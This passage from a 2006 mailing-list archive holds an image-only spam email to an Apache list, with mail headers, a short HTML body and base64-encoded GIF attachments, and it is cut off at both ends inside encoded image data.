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 ------=_NextPart_000_0019_01C6A5FF.DB216458-- From [email protected] Thu Jul 13 21:27:42 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 50871 invoked from network); 13 Jul 2006 21:27:42 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 13 Jul 2006 21:27:42 -0000 Received: (qmail 86056 invoked by uid 500); 13 Jul 2006 21:27:42 -0000 Delivered-To: [email protected] Received: (qmail 86053 invoked by uid 99); 13 Jul 2006 21:27:42 -0000 X-ASF-Spam-Status: No, hits=4.1 required=10.0 tests=EXTRA_MPART_TYPE,HTML_IMAGE_ONLY_08,HTML_MESSAGE,MIME_HTML_MOSTLY,MPART_ALT_DIFF X-Spam-Check-By: apache.org Received-SPF: neutral (hermes.apache.org: local policy) Received: from [161.129.204.104] (HELO fbxiaij) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Thu, 13 Jul 2006 14:27:33 -0700 Received: from [161.129.204.104] (helo=rgo.cf) by fbxiaij with smtp (Exim 4.43) id 1G18lK-0008MC-EF; Thu, 13 Jul 2006 17:30:22 -0400 Message-ID: <[email protected]> From: "Shari Sloan" <[email protected]> To: <[email protected]> Subject: trashy Date: Thu, 13 Jul 2006 17:23:04 -0400 MIME-Version: 1.0 Content-Type: multipart/related; type="multipart/alternative"; boundary="----=_NextPart_000_0006_01C6A6A1.8E932078" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N This is a multi-part message in MIME format. ------=_NextPart_000_0006_01C6A6A1.8E932078 Content-Type: multipart/alternative; boundary="----=_NextPart_001_0007_01C6A6A1.8E93208A" ------=_NextPart_001_0007_01C6A6A1.8E93208A Content-Type: text/plain; charset="windows-1252" Content-Transfer-Encoding: quoted-printable ------=_NextPart_001_0007_01C6A6A1.8E93208A Content-Type: text/html; charset="windows-1252" Content-Transfer-Encoding: quoted-printable <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML><HEAD> <META http-equiv=3DContent-Type content=3D"text/html; = charset=3Dwindows-1252"> <META content=3D"MSHTML 6.00.2600.0000" name=3DGENERATOR> <STYLE></STYLE> </HEAD> <BODY bgColor=3D#ffffff> <DIV><FONT face=3DArial size=3D2><IMG alt=3D"" hspace=3D0=20 src=3D"cid:[email protected]" align=3Dbaseline=20 border=3D0><IMG alt=3D"" hspace=3D0=20 src=3D"cid:[email protected]" align=3Dbaseline=20 border=3D0><IMG alt=3D"" hspace=3D0=20 src=3D"cid:[email protected]" align=3Dbaseline=20 border=3D0><IMG alt=3D"" hspace=3D0=20 src=3D"cid:[email protected]" align=3Dbaseline=20 border=3D0></FONT></DIV></BODY></HTML> ------=_NextPart_001_0007_01C6A6A1.8E93208A-- ------=_NextPart_000_0006_01C6A6A1.8E932078 Content-Type: image/gif; name="kindness.gif" Content-Transfer-Encoding: base64 Content-ID: <[email protected]> R0lGODdhNQC4AecAAN++vtawt2MQY2QRY2kZaHowdKdvld69vptfjNu5u9q4uti0ucaarIVAfGYU Zdq2utKttcecrNy5vMidrbuMpGQTZNm1udWvt7F+nGweao1MgngtctSutoA5ealylt26vN69vZ9k j2wcaZJShrB8nKZulNeyuGgYZ76PppGQeFxxSTZbJjRZJGF0TV9zS1ZtQkVjM05oO3F+XKKah9e5 t8evp4yNdJyXgtO3tFhuRN28vdy6vNq7usqyq8SYqo5MgpRWh4M9ep1hjb6PpYVBfJhbipJShZpd i656mqt2mMqgrqFnkKNrkmYVZcKVqHUqcM6lscCTp4lGf7yNpIQ/e7KAncaaq4tIgG0faoA5eHw0 dX83d9ezuNGqs9Outadwlcuir8+osp9lj5mVgGFzTF5ySruNpItKgXw0dqhylsqhr9i1udm3us6n stq4u9GstJxhjbeHoYdEfpNVh6x4mcOYqtWxt4Q/fL+Sp8CSp4dCfXAhbGgWZrB8m4M8es2ksK13 mbeEoK95msmfrbN/nbSCnqp0l7uKo967vXQnb3wydYtHgNWvtnQob6Vsk3gscpdZiZZXiLiHodOt tdKrtHwzdcacrAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAANQC4AQAI/gABCBxI sKDBgwgTKlzIsKHDhxAjSpxIsaLFixgzatzIsaPHjyBDihxJsqTJkyhTqlzJsqXLlzBjypxJs6bN mzhzWgwgoKfPAQQKGDiQkqfPoz0RFPWZQMECBg16OniA0qgAghB8Rqjqk6AEnxMAMB1plSCFnhUs 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 ------=_NextPart_000_0006_01C6A6A1.8E932078 Content-Type: image/gif; name="war criminal.gif" Content-Transfer-Encoding: base64 Content-ID: <[email protected]> R0lGODdhDgC4AecAAN++vmMQY9u5u9OttYE6eWQRZN67vYdCfWUUZZRWh5lci928vbSCntm3usaa q8GUqM2ksd69vk5oO0VjM2F0Tcevp3F+XDZbJsqyq9O3tNq7ujRZJFZtQpyXgoyNdGFzTN69vZGQ eNe5t6Kah1xxSV5ySotIgKZulJJShXw0dYA5eH83d4VBfI5MgmQRY8qgrohEftq4utezuK56mtGq s3UqcNOutadwlcuir8+osppdi6lylt26vJ9lj20farB8m6p0l8KVqMmfrZtfjKFnkIlGf7iHocCT p76PpZ1hjVhuRJmVgNy6vIdEfoQ/fLuNpItKgaNrktKttXw0dsqhr8acrNWxt6hylqx4mZNVh86n stayuJxhjb+Sp4A5eY9PhLeHoZhbiq13mdawt4M9engscnQob9eyuKVsk5dZicCSp9m1ubN/nXAh bIM8eotHgGwcabyNpMecrLuKo9q2usSYqmgWZq95mngtcnwydZZXiNKrtLeEoM6lsc+nsnQnb9Wv tsOYqgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAADgC4AQAI/gABCBxI sKDBgwgTKlzIsKHDhxAjSpxIsaLFixgzatzIsaPHjAFCChAoIGSAAQQKGDA5EkDJkAdCrhRJ0iSC BAoWsKwZkoHABjtdmhzoIOjLAAMfGB0qEMLSkAMjPEU6cCpBqx+zat3KtavXr2DDit0oYQKFCgQr WJgw4QIFABguTMggUMMGDnQ7bBBoYYOHun4FZtgLwMOGDwJBZNCQmLDhCQg3UKAwYQPkgRVCWOh7 UENfCxUGHzTMAYRAwgUr/z198EJg1gNNA6j8FoAIvyMykxBoeIMFDxw8XJBrYUTdtRdKVFgwtvlE EycYBkBhMIWKFSwAtAjgQsWLgTAC/sSQ4ULg9IIgAswAQMM89YI1Aqiw4d4giBshcQA4XzAHgKI6 7PceQdHJEMAOAlaXQAos8ABADz7M4KBHsi0UYEQ/ABHEQkLwZxB09R3En4cEbdfdC9MNERIRAhWR 4H4+GAGCClSVN+J7CVAVIn85CiTEizwidQRSNwrUYxFEUpcejkihgBSEM+gQQIxI+BBAEjT44NyW XHbp5ZdgbplBBwxVcBkHH6CllmYiALCWB2bSJYIExv0GgJkCTYDWCHMB0AEHd17WJ5+m8RmoQMYB wGebfx5K0Jxo2WmmaRyEINCaFrSpwQcjjHmZQhZYuhAGYZZq6qmoggXCCIkmpIEH/p+C2pAFDXlA QVkTWEAXAK9KIFdbGGjgK60gUCBXByNwUNsHcik6XKKruTmctBeQWpgFSijR1gUAcDCcbMKFAIIF 0/p6AWOFnUstAMxegFa6dBnLrXAX/KVBCW55YO4SGWyrhAQlsJUpuYhV8AFbI0SbqqkjmIsBsxyE xuwEf8lLAbkXfPABBd5yi7Fx+F5gXFweTwuAvIlNizFfJgOgsskrC/Qyt+vKXDLNMbvMrbymoQwA CM+a24GZw4WQAb0LM9SqrAxVmFG1EEsslweyuYWxxhwPR6bLID8L13C0uiyQz0BfEDbOLYMtM8s0 63w22wOpLXbNbsvcs8llnz30/rZG00tn0gwpnFDYCxH+tAQetKkoB2x9IELDTJBbAhMVDIcBufHe qTW9jyfuJgAZDEdBCGCj+3nZeJkbMV+8DgdoBhiL/Hnobg00wnCQ0Vr5BR14gJi0uXt2gRKvzgUC 